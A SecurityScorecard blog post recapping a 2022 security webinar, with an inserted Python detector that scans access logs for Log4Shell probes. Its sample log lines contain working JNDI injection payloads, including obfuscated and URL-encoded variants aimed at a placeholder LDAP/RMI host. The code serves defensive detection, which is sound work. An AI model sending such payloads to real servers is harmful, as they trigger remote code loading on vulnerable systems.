As organizations look to take their 2022 security concerns head-on, they need to create resilient cybersecurity programs that help them make smarter, faster, informed decisions. In our recent webinar, I had the pleasure of chatting with security professionals Mike Wilkes from SecurityScorecard, Scott Fuller from Access Health, and John Beal from St. Charles Health. They discussed the challenges they face and how they plan to mitigate risk across their entire ecosystems in 2022. Here’s a recap of what we learned and what they’re predicting for 2022.
Securing the supply chain
From a security operations standpoint, organizations struggle to manage third-party vendor risk across their ecosystem because they often lack the data necessary to make decisions.
On this topic, John Beal shared: “We found that when we actually engage with a vendor with the physical hard report it really started open dialogue. It started really building the trust between us and our vendors that was very beneficial going forward.”
As companies scale, they need to ensure that they’re doing their due diligence and managing their documentation.
“I want to be able to get beyond just having the burden of answering those questions and helping keep the business moving,” said Mike Wilkes. “Some people take three to six months to fill out these questionnaires in the old school way.”
The time companies spend trying to get their due diligence completed often slows down important business operations. Automating this process to enable bulk assessments is a key step that every organization must take to stay ahead of risk in 2022.
Prospects of a ransomware attack and vulnerabilities
Going into 2022, the potential of a ransomware attack that starts with the exploitation of a known CVE is a high priority for most organizations. The recent log4j vulnerability (Log4Shell, CVE-2021-44228) only makes these concerns more pressing: it is trivial to exploit, it sits in a logging library embedded in countless products, and the first exploitation attempts leave a visible trace in the very logs it affects.
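One practical hygiene step for the Log4Shell case is to sweep existing web access logs for the JNDI lookup strings the exploit relies on. Attackers quickly moved from the plain `${jndi:ldap://...}` form to URL-encoded and nested-lookup variants (`${${lower:j}ndi:...}`, `${${::-j}${::-n}...}`, `${${env:NOPE:-j}ndi:...}`), so a naive substring match misses most of them. The detector below is an added example and is not code from the webinar or from SecurityScorecard; the access-log lines are constructed samples, and the IP addresses, the `scan` and `jndi_scheme` helper names and the set of obfuscation tricks it resolves are my own choices, not an exhaustive list.

```python
import re
import urllib.parse

# Constructed sample access-log lines (combined log format). Not real traffic:
# the 198.51.100.x addresses are documentation ranges. Lines 1-4 carry Log4Shell
# probes in progressively obfuscated forms; lines 0 and 5 are benign, and line 5
# contains a "${...}" string that must NOT be flagged.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:rmi://198.51.100.7:1099/a}"',
    '10.0.0.12 - - [10/Dec/2021:12:00:06 +0000] "GET /docs/${version} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# ${lower:x} / ${upper:x} case lookups, innermost only (no nested "${" inside).
_CASE_LOOKUP_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# Default-value syntax ${prefix:key:-default}; covers ${::-j} and ${env:NOPE:-j}.
_DEFAULT_VALUE_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The final shape we care about, with the URL scheme captured for triage.
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def url_decode_fully(s: str, max_rounds: int = 3) -> str:
    """URL-decode until stable; attackers sometimes double-encode."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def _apply_case(match: re.Match) -> str:
    text = match.group(2)
    return text.lower() if match.group(1).lower() == "lower" else text.upper()


def resolve_lookups(s: str, max_rounds: int = 10) -> str:
    """Collapse nested Log4j-style lookups from the inside out until stable.

    Only the case and default-value forms are resolved here; the round cap
    prevents pathological input from looping indefinitely.
    """
    for _ in range(max_rounds):
        new = _CASE_LOOKUP_RE.sub(_apply_case, s)
        new = _DEFAULT_VALUE_RE.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def normalize(line: str) -> str:
    """Decode transport-level encoding first, then undo lookup obfuscation."""
    return resolve_lookups(url_decode_fully(line))


def jndi_scheme(line: str):
    """Return the JNDI URL scheme (e.g. 'ldap', 'rmi') if the line carries a lookup, else None."""
    match = _JNDI_RE.search(normalize(line))
    return match.group(1).lower() if match else None


def is_jndi_lookup(line: str) -> bool:
    return jndi_scheme(line) is not None


def scan(lines) -> list:
    """Indices of log lines that contain a (possibly obfuscated) JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for idx in scan(SAMPLE_LOGS):
        print(f"line {idx}: scheme={jndi_scheme(SAMPLE_LOGS[idx])}  {normalize(SAMPLE_LOGS[idx])[:100]}")
```

A hit here only proves a probe reached the server, not that it succeeded; the follow-up is to check outbound LDAP/RMI connections from the affected host around the same timestamp and to confirm the Log4j version actually in use, since vulnerable copies are frequently bundled inside third-party products rather than declared as direct dependencies.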
“These basic hygiene things, that’s what open source intelligence and our scanning of the internet every day helps with. It’s revealing 30 billion to 40 billion vulnerabilities a week and 700 million malware events coming into our sinkholes every day,” shared Mike Wilkes. “There’s a whole lot of easy, low-hanging fruit out there that can be fixed.”
On a positive note, Scott believes that “it seems like as a whole the communication has gotten better. Most of the people, within the first couple of days of log4j coming to light, have formulated a response and pushed it out to their customers in a proactive way,” he explained. “One of the things that I find encouraging is that there seems to be an overall maturity of security awareness and security programs across the board.”
John agrees that readily available cybersecurity data makes it easier to communicate risk to executives. “One of the things that I liked about SecurityScorecard is the data, but then it’s also you can create a report that’s really digestible to upper management and say ‘take a look at this,’ and they say, ‘that’s why that’s important,’” he explained. “Maybe we don’t typically do maintenance on the weekends, but maybe we need to do maintenance this weekend to go ahead and patch this stuff because I can see why that’s important.”
Staffing shortage
Staffing across IT is challenging, but finding people with the right security credentials and experience brings its own difficulties.
For example, Scott shared that “your team has to do twice as much with half the team, so looking for solutions, looking for ways to automate.” To meet this need to do more with less, automating routine tasks is key. “For me, lessons learned from the past is just how to magnify any resource you have and use them in the most effective way possible.”
Regulatory and compliance changes
Compliance includes due diligence documentation, but it also means responding to the ever-evolving regulatory landscape. Automating compliance moves the business forward because it reduces the time spent on repetitive, administrative tasks.
SecurityScorecard helps thousands of customers with continuous monitoring to meet compliance requirements. For example, Scott shared, “I currently use SecurityScorecard as an important part of monitoring our own security postures as well as holding ourselves to the same standards that our healthcare customers expect from us.”
Mike Wilkes chimed in on the power of an automated questionnaire management platform. “I answer your question once and it can be automatically pre-populated for me for several other frameworks,” he explained. “I think we have about 29 or 30 different frameworks, including HIPAA and PCI. For example, the average questionnaire turnaround is seven days with three iterations.”
SecurityScorecard: Security Ratings for Clearing Hurdles
SecurityScorecard’s security ratings platform provides the visibility organizations need to monitor, remediate, and track cybersecurity risks. Create your free account today to see how SecurityScorecard can strengthen your 2022 plans.
You can watch our webinar “Clearing Security Hurdles Faster to Drive Business Forward in 2022” on demand to see how SecurityScorecard helps customers achieve their security and business goals.